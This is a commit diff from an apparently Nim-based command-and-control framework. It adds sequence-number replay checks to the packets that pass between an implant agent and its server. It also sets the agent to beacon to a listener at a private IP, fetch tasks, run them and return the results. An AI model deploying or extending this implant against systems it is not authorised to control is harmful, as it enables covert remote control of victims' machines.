Implemented sequence tracking.
This commit is contained in:
@@ -1,6 +1,6 @@
|
||||
import times
|
||||
|
||||
import ../../common/[types, serialize, utils, crypto]
|
||||
import ../../common/[types, serialize, sequence, utils, crypto]
|
||||
|
||||
proc createHeartbeat*(config: AgentConfig): Heartbeat =
|
||||
return Heartbeat(
|
||||
@@ -11,7 +11,7 @@ proc createHeartbeat*(config: AgentConfig): Heartbeat =
|
||||
flags: cast[uint16](FLAG_ENCRYPTED),
|
||||
size: 0'u32,
|
||||
agentId: uuidToUint32(config.agentId),
|
||||
seqNr: 0'u64,
|
||||
seqNr: 0'u64,
|
||||
iv: generateIV(),
|
||||
gmac: default(AuthenticationTag)
|
||||
),
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
import winim, os, net, strformat, strutils, registry, sugar
|
||||
|
||||
import ../../common/[types, serialize, crypto, utils]
|
||||
import ../../common/[types, serialize, sequence, crypto, utils]
|
||||
|
||||
# Hostname/Computername
|
||||
proc getHostname(): string =
|
||||
@@ -202,7 +202,7 @@ proc collectAgentMetadata*(config: AgentConfig): AgentRegistrationData =
|
||||
flags: cast[uint16](FLAG_ENCRYPTED),
|
||||
size: 0'u32,
|
||||
agentId: uuidToUint32(config.agentId),
|
||||
seqNr: 1'u64, # TODO: Implement sequence tracking
|
||||
seqNr: nextSequence(uuidToUint32(config.agentId)),
|
||||
iv: generateIV(),
|
||||
gmac: default(AuthenticationTag)
|
||||
),
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
import strutils, tables, json, strformat, sugar
|
||||
|
||||
import ../../modules/manager
|
||||
import ../../common/[types, serialize, crypto, utils]
|
||||
import ../../common/[types, serialize, sequence, crypto, utils]
|
||||
|
||||
proc handleTask*(config: AgentConfig, task: Task): TaskResult =
|
||||
try:
|
||||
@@ -22,7 +22,9 @@ proc deserializeTask*(config: AgentConfig, bytes: seq[byte]): Task =
|
||||
if header.packetType != cast[uint8](MSG_TASK):
|
||||
raise newException(CatchableError, "Invalid packet type.")
|
||||
|
||||
# TODO: Validate sequence number
|
||||
# Validate sequence number
|
||||
if not validateSequence(header.agentId, header.seqNr, header.packetType):
|
||||
raise newException(CatchableError, "Invalid sequence number.")
|
||||
|
||||
# Decrypt payload
|
||||
let payload = unpacker.getBytes(int(header.size))
|
||||
|
||||
@@ -1,10 +1,7 @@
|
||||
import times, sugar
|
||||
import ../../common/[types, serialize, crypto, utils]
|
||||
import ../../common/[types, serialize, sequence, crypto, utils]
|
||||
|
||||
proc createTaskResult*(task: Task, status: StatusType, resultType: ResultType, resultData: seq[byte]): TaskResult =
|
||||
|
||||
# TODO: Implement sequence tracking
|
||||
|
||||
return TaskResult(
|
||||
header: Header(
|
||||
magic: MAGIC,
|
||||
@@ -13,7 +10,7 @@ proc createTaskResult*(task: Task, status: StatusType, resultType: ResultType, r
|
||||
flags: cast[uint16](FLAG_ENCRYPTED),
|
||||
size: 0'u32,
|
||||
agentId: task.header.agentId,
|
||||
seqNr: 1'u64,
|
||||
seqNr: nextSequence(task.header.agentId),
|
||||
iv: generateIV(),
|
||||
gmac: default(array[16, byte])
|
||||
),
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
import strformat, os, times, system, base64
|
||||
import winim
|
||||
|
||||
import core/[task, taskresult, heartbeat, http, register]
|
||||
import ../modules/manager
|
||||
@@ -81,29 +80,34 @@ proc main() =
|
||||
let date: string = now().format("dd-MM-yyyy HH:mm:ss")
|
||||
echo fmt"[{date}] Checking in."
|
||||
|
||||
# Retrieve task queue for the current agent by sending a check-in/heartbeat request
|
||||
# The check-in request contains the agentId, listenerId, so the server knows which tasks to return
|
||||
var heartbeat: Heartbeat = config.createHeartbeat()
|
||||
let
|
||||
heartbeatBytes: seq[byte] = config.serializeHeartbeat(heartbeat)
|
||||
packet: string = config.getTasks(heartbeatBytes)
|
||||
try:
|
||||
# Retrieve task queue for the current agent by sending a check-in/heartbeat request
|
||||
# The check-in request contains the agentId, listenerId, so the server knows which tasks to return
|
||||
var heartbeat: Heartbeat = config.createHeartbeat()
|
||||
let
|
||||
heartbeatBytes: seq[byte] = config.serializeHeartbeat(heartbeat)
|
||||
packet: string = config.getTasks(heartbeatBytes)
|
||||
|
||||
if packet.len <= 0:
|
||||
echo "No tasks to execute."
|
||||
continue
|
||||
if packet.len <= 0:
|
||||
echo "No tasks to execute."
|
||||
continue
|
||||
|
||||
let tasks: seq[Task] = config.deserializePacket(packet)
|
||||
let tasks: seq[Task] = config.deserializePacket(packet)
|
||||
|
||||
if tasks.len <= 0:
|
||||
echo "No tasks to execute."
|
||||
continue
|
||||
|
||||
# Execute all retrieved tasks and return their output to the server
|
||||
for task in tasks:
|
||||
var result: TaskResult = config.handleTask(task)
|
||||
let resultBytes: seq[byte] = config.serializeTaskResult(result)
|
||||
|
||||
config.postResults(resultBytes)
|
||||
|
||||
except CatchableError as err:
|
||||
echo "[-] ", err.msg
|
||||
|
||||
if tasks.len <= 0:
|
||||
echo "No tasks to execute."
|
||||
continue
|
||||
|
||||
# Execute all retrieved tasks and return their output to the server
|
||||
for task in tasks:
|
||||
var result: TaskResult = config.handleTask(task)
|
||||
let resultBytes: seq[byte] = config.serializeTaskResult(result)
|
||||
|
||||
config.postResults(resultBytes)
|
||||
|
||||
when isMainModule:
|
||||
main()
|
||||
@@ -1,9 +1,9 @@
|
||||
# Agent configuration
|
||||
-d:ListenerUuid="D3AC0FF3"
|
||||
-d:Octet1="127"
|
||||
-d:Octet2="0"
|
||||
-d:Octet3="0"
|
||||
-d:Octet4="1"
|
||||
-d:ListenerPort=9999
|
||||
-d:SleepDelay=5
|
||||
-d:ListenerUuid="1842337B"
|
||||
-d:Octet1="172"
|
||||
-d:Octet2="29"
|
||||
-d:Octet3="177"
|
||||
-d:Octet4="43"
|
||||
-d:ListenerPort=8080
|
||||
-d:SleepDelay=3
|
||||
-d:ServerPublicKey="mi9o0kPu1ZSbuYfnG5FmDUMAvEXEvp11OW9CQLCyL1U="
|
||||
|
||||
28
src/common/sequence.nim
Normal file
28
src/common/sequence.nim
Normal file
@@ -0,0 +1,28 @@
|
||||
import tables
|
||||
import ./[types, utils]
|
||||
|
||||
var sequenceTable {.global.}: Table[uint32, uint64]
|
||||
|
||||
proc nextSequence*(agentId: uint32): uint64 =
|
||||
sequenceTable[agentId] = sequenceTable.getOrDefault(agentId, 0'u64) + 1
|
||||
return sequenceTable[agentId]
|
||||
|
||||
proc validateSequence*(agentId: uint32, seqNr: uint64, packetType: uint8): bool =
|
||||
let lastSeqNr = sequenceTable.getOrDefault(agentId, 0'u64)
|
||||
|
||||
# Heartbeat messages are not used for sequence tracking
|
||||
if cast[PacketType](packetType) == MSG_HEARTBEAT:
|
||||
return true
|
||||
|
||||
# In order to keep agents running after server restart, accept all connection with seqNr = 1, to update the table
|
||||
if seqNr == 1'u64:
|
||||
sequenceTable[agentId] = seqNr
|
||||
return true
|
||||
|
||||
# Validate that the sequence number of the current packet is higher than the currently stored one
|
||||
if seqNr <= lastSeqNr:
|
||||
return false
|
||||
|
||||
# Update sequence number
|
||||
sequenceTable[agentId] = seqNr
|
||||
return true
|
||||
@@ -74,7 +74,6 @@ type
|
||||
|
||||
Task* = object
|
||||
header*: Header
|
||||
|
||||
taskId*: uint32 # [4 bytes ] task id
|
||||
listenerId*: uint32 # [4 bytes ] listener id
|
||||
timestamp*: uint32 # [4 bytes ] unix timestamp
|
||||
@@ -84,7 +83,6 @@ type
|
||||
|
||||
TaskResult* = object
|
||||
header*: Header
|
||||
|
||||
taskId*: uint32 # [4 bytes ] task id
|
||||
listenerId*: uint32 # [4 bytes ] listener id
|
||||
timestamp*: uint32 # [4 bytes ] unix timestamp
|
||||
@@ -103,6 +101,7 @@ type
|
||||
|
||||
# Registration binary structure
|
||||
type
|
||||
|
||||
# All variable length fields are stored as seq[byte], prefixed with 4 bytes indicating the length of the following data
|
||||
AgentMetadata* = object
|
||||
listenerId*: uint32
|
||||
@@ -151,7 +150,7 @@ type
|
||||
port*: int
|
||||
protocol*: Protocol
|
||||
|
||||
# Server structure
|
||||
# Server context structure
|
||||
type
|
||||
KeyPair* = object
|
||||
privateKey*: Key
|
||||
@@ -165,7 +164,7 @@ type
|
||||
interactAgent*: Agent
|
||||
keyPair*: KeyPair
|
||||
|
||||
# Agent Config
|
||||
# Agent config
|
||||
type
|
||||
AgentConfig* = ref object
|
||||
agentId*: string
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
import strutils, strformat, streams, times, tables
|
||||
import ../utils
|
||||
import ../../common/[types, utils, serialize, crypto]
|
||||
import ../../common/[types, utils, serialize, sequence, crypto]
|
||||
|
||||
proc serializeTask*(cq: Conquest, task: var Task): seq[byte] =
|
||||
|
||||
@@ -44,7 +44,9 @@ proc deserializeTaskResult*(cq: Conquest, resultData: seq[byte]): TaskResult =
|
||||
if header.packetType != cast[uint8](MSG_RESPONSE):
|
||||
raise newException(CatchableError, "Invalid packet type for task result, expected MSG_RESPONSE.")
|
||||
|
||||
# TODO: Validate sequence number
|
||||
# Validate sequence number
|
||||
if not validateSequence(header.agentId, header.seqNr, header.packetType):
|
||||
raise newException(CatchableError, "Invalid sequence number.")
|
||||
|
||||
# Decrypt payload
|
||||
let payload = unpacker.getBytes(int(header.size))
|
||||
@@ -93,7 +95,9 @@ proc deserializeNewAgent*(cq: Conquest, data: seq[byte]): Agent =
|
||||
if header.packetType != cast[uint8](MSG_REGISTER):
|
||||
raise newException(CatchableError, "Invalid packet type for agent registration, expected MSG_REGISTER.")
|
||||
|
||||
# TODO: Validate sequence number
|
||||
# Validate sequence number
|
||||
if not validateSequence(header.agentId, header.seqNr, header.packetType):
|
||||
raise newException(CatchableError, "Invalid sequence number.")
|
||||
|
||||
# Key exchange
|
||||
let agentPublicKey = unpacker.getKey()
|
||||
@@ -153,9 +157,11 @@ proc deserializeHeartbeat*(cq: Conquest, data: seq[byte]): Heartbeat =
|
||||
if header.packetType != cast[uint8](MSG_HEARTBEAT):
|
||||
raise newException(CatchableError, "Invalid packet type for checkin request, expected MSG_HEARTBEAT.")
|
||||
|
||||
# TODO: Validate sequence number
|
||||
# Validate sequence number
|
||||
if not validateSequence(header.agentId, header.seqNr, header.packetType):
|
||||
raise newException(CatchableError, "Invalid sequence number.")
|
||||
|
||||
# Decrypt payload
|
||||
# Decrypt payload
|
||||
let payload = unpacker.getBytes(int(header.size))
|
||||
let (decData, gmac) = decrypt(cq.agents[uuidToString(header.agentId)].sessionKey, header.iv, payload, header.seqNr)
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
import strutils, strformat, times
|
||||
import ../utils
|
||||
import ../../common/[types, utils, crypto]
|
||||
import ../../common/[types, utils, sequence, crypto]
|
||||
|
||||
proc parseInput*(input: string): seq[string] =
|
||||
var i = 0
|
||||
@@ -105,7 +105,7 @@ proc parseTask*(cq: Conquest, command: Command, arguments: seq[string]): Task =
|
||||
taskHeader.flags = cast[uint16](FLAG_ENCRYPTED)
|
||||
taskHeader.size = 0'u32
|
||||
taskHeader.agentId = uuidtoUint32(cq.interactAgent.agentId)
|
||||
taskHeader.seqNr = 1'u64 # TODO: Implement sequence tracking
|
||||
taskHeader.seqNr = nextSequence(taskHeader.agentId)
|
||||
taskHeader.iv = generateIV() # Generate a random IV for AES-256 GCM
|
||||
taskHeader.gmac = default(AuthenticationTag)
|
||||
|
||||
|
||||
Reference in New Issue
Block a user